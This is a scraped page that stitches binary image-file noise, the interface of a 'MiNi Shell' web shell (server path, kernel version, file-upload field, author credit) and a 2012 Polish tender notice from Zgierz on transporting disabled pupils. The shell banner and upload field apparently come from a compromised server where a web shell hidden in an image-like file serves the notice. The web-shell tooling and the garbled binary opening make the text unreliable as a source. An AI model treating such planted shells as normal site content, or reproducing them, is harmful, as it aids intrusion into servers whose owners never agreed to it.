JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120719/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120719/157935-N-2012.html

<p class="kh_header"><b>Zgierz: Dowóz i odwóz uczniów niepełnosprawnych z terenu miasta Zgierza do szkół i ośrodków w roku szkolnym 2012/2013</b><br>
<b>Numer ogłoszenia: 157935 - 2012; data zamieszczenia: 19.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Zgierz , Plac Jana Pawła II 16, 95-100 Zgierz, woj. łódzkie, tel. 0427162854 w. 200, 7143200, faks 042 7143203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz i odwóz uczniów niepełnosprawnych z terenu miasta Zgierza do szkół i ośrodków w roku szkolnym 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa transportowa polegająca na dowozie i odwozie uczniów niepełnosprawnych z terenu miasta Zgierza, do szkół i ośrodków, w roku szkolnym 2012/2013, w okresie od 3 września 2012 r. do 28 czerwca 2013 r. Zamawiający przewiduje podział zamówienia na trzy części. Każdy wykonawca może złożyć ofertę na jedną, dwie lub trzy części zamówienia. Wykonawca powinien dysponować co najmniej jednym pojazdem wraz z kierowcą na trasę określoną w każdej części opisu przedmiotu zamówienia oraz opiekunem  na trasę określoną w części I opisu przedmiotu zamówienia.
WARUNKI  WYKONANIA  ZAMÓWIENIA KAŻDEJ  Z  TRZECH  JEGO CZĘŚCI:
1) Wynagrodzenie Wykonawcy dla każdej z trzech części zamówienia ma charakter wynagrodzenia ryczałtowego, które zawiera wszystkie koszty związane z realizacją zamówienia i pozostaje niezmienne do zakończenia realizacji przedmiotu zamówienia a Wykonawca nie może żądać podwyższenia wynagrodzenia (z wyjątkiem okoliczności określonych w art. 632 §2 k.c.), chociażby w czasie realizacji zamówienia nie można było przewidzieć rozmiaru lub kosztów przedmiotu zamówienia. 
2) Przedmiot zamówienia nie obejmuje dojazdu Wykonawcy z jego bazy do pierwszego przystanku ani  powrotu z końcowego przystanku do bazy, a koszty wynikające z tego tytułu obciążają  Wykonawcę. 
3) Dowozy uczniów odbywać się będą od poniedziałku do piątku, w dni nauki szkolnej  zgodnie z rozkładem jazdy opracowanym przez Wykonawcę  w uzgodnieniu z Zamawiającym, w sposób zapewniający uczniom obecność w szkole (ośrodku), w czasie trwania lekcji (zajęć). Dowozy powinny być tak zorganizowane, aby na początku trasy zabierany był opiekun, którego dla części I zamówienia organizuje i zapewnia Wykonawca, dla części II i III organizuje i zapewnia Zamawiający. Osoby sprawujące opiekę powinny posiadać odpowiednie przygotowanie zawodowe do opieki nad dziećmi niepełnosprawnymi (ukończony odpowiedni kurs, szkołę, uczelnię, itp.).
4) Pojazdy muszą odpowiadać wymogom określonym w rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu niezbędnego wyposażenia (Dz. U. z 2003 r. Nr 32, poz. 262 z późn.zm.). 
5) Wykonawca powinien mieć zdolność przewozową  do przewozu wskazanej w  opisie przedmiotu zamówienia liczby przewożonych uczniów niepełnosprawnych  plus kierowca i opiekun w każdym pojeździe.
6) Wykonawca powinien dysponować  dla części I zamówienia   pojazdem z miejscami na co najmniej 1 wózek inwalidzki, dla części II zamówienia z miejscami na co najmniej 2 wózki inwalidzkie - z mocowaniem uniemożliwiającym ich przesuwanie w czasie jazdy.
7) Wykonawca zobowiązany jest we własnym zakresie zapewnić pojazd  zastępczy w przypadku awarii pojazdu, którym świadczył usługę transportową oraz zapewnić ciągłość dowozu w trakcie realizacji zamówienia zgodnie z opisem przedmiotu zamówienia.
8) Wykonawca zobowiązany jest do zapewnienia osobom przewożonym właściwych warunków bezpieczeństwa i higieny zgodnie z przepisami i zasadami określonymi w prawie przewozowym (Dz. U. z 2000 r. Nr 50, poz.601 z późn. zm.)  ze szczególnym uwzględnieniem zasad przewozu dzieci i młodzieży szkolnej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Świadczenie usług transportowych w zakresie dowozu i odwozu uczniów niepełnosprawnych z terenu miasta Zgierza, do szkół i ośrodków,  stanowiące 50 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie -co najmniej 2 usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia (związanych z przedmiotem zamówienia), tj. przewóz osób niepełnosprawnych wykonywany w sposób ciągły ( w okresie nie krótszym niż 6 miesięcy każda z wykazanych usług), potwierdzone załączonymi dokumentami (np. referencjami), że te usługi zostały wykonane lub są wykonywane należycie. Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz wykazu wykonanych usług z załączonym dokumentem potwierdzającym że usługi zostały wykonane lub są wykonywane należycie, wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest dysponowanie narzędziami, wyposażeniem zakładu i urządzeniami technicznymi dostępnymi wykonawcy usług w celu realizacji zamówienia, w szczególności: - dysponowanie co najmniej jednym pojazdem, na każdą z części zamówienia, przystosowanym do przewozu osób niepełnosprawnych; warunek dla części I - pojazd powinien dysponować miejscem na co najmniej jeden wózek inwalidzki z mocowaniem uniemożliwiającym jego przesuwanie w czasie jazdy; warunek dla części II - pojazd powinien dysponować miejscami na co najmniej dwa wózki inwalidzkie z mocowaniem uniemożliwiającym ich przesuwanie w czasie jazdy. Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadającymi wymagane kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia tj.: - warunek dla części I zamówienia - dysponowanie minimum 1 osobą posiadającą przygotowanie zawodowe poświadczone ukończeniem: - zakładu kształcenia nauczycieli lub studiów wyższych na kierunku oligofrenopedagogika, pedagogika, pedagogika specjalna lub - zakładu kształcenia nauczycieli lub studiów wyższych na dowolnym kierunku nauczycielskim i ukończone studia podyplomowe lub kurs kwalifikacyjny na kierunku oligofrenopedagogika, pedagogika, pedagogika specjalna; - warunek dla części I, II i III - dysponowanie minimum 1 kierowcą, do każdej części zamówienia, posiadającym uprawnienia kategorii D. Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wg kryterium: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu wg kryterium: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. Zmiany umowy będą możliwe wówczas, jeżeli:
1) nie będą dotyczyły istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy albo
2) okażą się korzystne dla Zamawiającego, przy czym korzystność zmiany rozpatrywana będzie przez Zamawiającego w ujęciu subiektywnym, w odniesieniu do konkretnego stanu faktycznego i całokształtu praw i obowiązków Zamawiającego wynikających z zawartej umowy albo
3) konieczność takich zmian wyniknie z okoliczności, których przy zachowaniu należytej staranności nie można było przewidzieć w chwili zawierania umowy, w szczególności w przypadkach: istotnej zmiany na rynku walutowym, istotnej zmiany na rynku ekonomicznym, istotnej zmiany prawa - zmiany przepisów powszechnie
obowiązujących, istotna, odbiegająca od normy, zmiana warunków atmosferycznych,
itp. 
II. Dokonanie zmian będzie w szczególności możliwe w przypadku wystąpienia 
co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych
powyżej warunków ich wprowadzenia:
1.  W zakresie zmiany terminu realizacji zamówienia oraz terminów wynikających 
z harmonogramu Zamawiający, w szczególności, dopuszcza zmianę:
1) jeżeli uzasadniona będzie okolicznościami leżącymi po stronie Zamawiającego, 
w szczególności sytuacją finansową zdolnościami płatniczymi lub warunkami organizacyjnymi;
2) gdy zaistnieje inna, niemożliwa do przewidzenia okoliczność prawna, ekonomiczna lub techniczna, za którą żadna Strona nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie ze specyfikacją istotnych warunków zamówienia;
2. W zakresie zmian spowodowanych następującymi okolicznościami:
a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
b) zmiana obowiązującej stawki VAT (zmiana stawki VAT dotyczyć będzie ceny, w części, jakiej dotyczą te zmiany przepisów),
c) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy,
d) zmiany w harmonogramie usługi,
e) zmiany uzasadnione okolicznościami, o których mowa w art. 357 ze znaczkiem 1 Kodeksu cywilnego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.umz.zgierz.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgierza, 95-100 Zgierz, plac Jana Pawła II 16, pokój nr 219.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 12:45, miejsce: Urząd Miasta Zgierza, 95-100 Zgierz, plac Jana Pawła II 16, PUNKT OBSŁUGI INTERESANTA (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 24.08.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z Wykonawcami są: - w sprawach merytorycznych: 1) Małgorzata Andrzejewska, z-ca naczelnika, pok. nr 3, tel.: (42) 714-31-72, 2) Katarzyna Filipiak, inspektor, pok. nr 4, tel.: (42) 714-31-75, - w sprawach proceduralnych: 1) Zofia Zamojska, gł. specjalista i 2) Lech Dąbski, naczelnik, pok. 219, tel.: (42) 714-32-00 oraz 3) Ewa Stasiak, inspektor, pok. 220, tel.: (42) 714-32-34. Postępowanie o udzielenie zamówienia prowadzi się z zachowaniem formy pisemnej, przy czym oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie lub faksem, albo drogą elektroniczną. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. W przypadku zastosowania przez Wykonawcę elektronicznej formy porozumiewania się z Zamawiającym - wymagane jest telefoniczne uprzedzenie Zamawiającego o takim zamiarze na numer: (42) 71-43-200 - pod rygorem nie uznania tej czynności za wykonaną.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz i odwóz uczniów niepełnosprawnych z terenu miasta Zgierza do szkół i ośrodków w roku szkolnym 2012/2013 - cz. I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dowóz i odwóz uczniów z domu wraz z organizacją i zapewnieniem opieki, z terenu miasta Zgierza we wszystkie dni nauki szkolnej nie wcześniej niż od godz. 7:00 do:
- Ośrodka Szkolno-Wychowawczego w Zgierzu przy ul. Parzęczewskiej 46 - dla 9 uczniów (w tym dla 1 ucznia na wózku inwalidzkim).
Przewidywana maksymalna długość trasy wynosi 40 km dziennie, w każdym dniu nauki. Liczba dni przyjętych w okresie realizacji zamówienia - 200 dni. Łącznie w okresie wykonywania usługi 8 000 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz i odwóz uczniów niepełnosprawnych z terenu miasta Zgierza do szkół i ośrodków w roku szkolnym 2012/2013 - cz. II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dowóz i odwóz uczniów z punktu zbiórki (plac przed Polo-Marketem w Zgierzu, ul. Gałczyńskiego 34) we wszystkie dni nauki szkolnej nie wcześniej niż od godz. 7:00 do :
- Szkoły Podstawowej nr 1 z oddziałami integracyjnymi w Zgierzu przy ul. Piłsudskiego 1 - dla 2 uczniów (w tym 2 uczniów na wózku inwalidzkim), 
- Zespołu Szkół Specjalnych w Aleksandrowie Łódzkim przy ul. Franciszkańskiej 14/16 - dla 7 uczniów.
Przewidywana maksymalna długość trasy - 50 km dziennie, w każdym dniu nauki. Liczba dni przyjętych w okresie realizacji zamówienia - 200 dni. Łącznie w okresie wykonywania usługi 10 000 km. Opiekę organizuje i zapewnia Zamawiający.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dowóz i odwóz uczniów niepełnosprawnych z terenu miasta Zgierza do szkół i ośrodków w roku szkolnym 2012/2013 - cz. III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dowóz i odwóz uczniów z punktu zbiórki (plac przed Polo-Marketem w Zgierzu, ul. Gałczyńskiego 34) we wszystkie dni nauki szkolnej nie wcześniej niż od godz. 6:30 do :
- Specjalnego Ośrodka Szkolno-Wychowawczego dla Dzieci Słabowidzących w Łodzi przy ul. Dziewanny 24 - dla 4 uczniów, 
- Ośrodka Terapeutyczno-Edukacyjnego dla Dzieci i Młodzieży z Autyzmem Navicula Centrum w Łodzi przy ul. Cedry 2 - dla 1 ucznia,
- Specjalnego Ośrodka Szkolno-Wychowawczego dla Dzieci Niesłyszących w Łodzi przy ul. Krzywickiego 20 - dla 5 uczniów,
- Specjalnego Ośrodka Szkolno-Wychowawczego Nr 1 w Łodzi przy ul. Siedleckiej 7/21 - dla 1 ucznia.
Przewidywana maksymalna długość trasy - 236 km dziennie, w każdym dniu nauki. Liczba dni przyjętych w okresie realizacji zamówienia - 200 dni. Łącznie w okresie wykonywania usługi 47 200  km. Opiekę organizuje i zapewnia Zamawiający.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com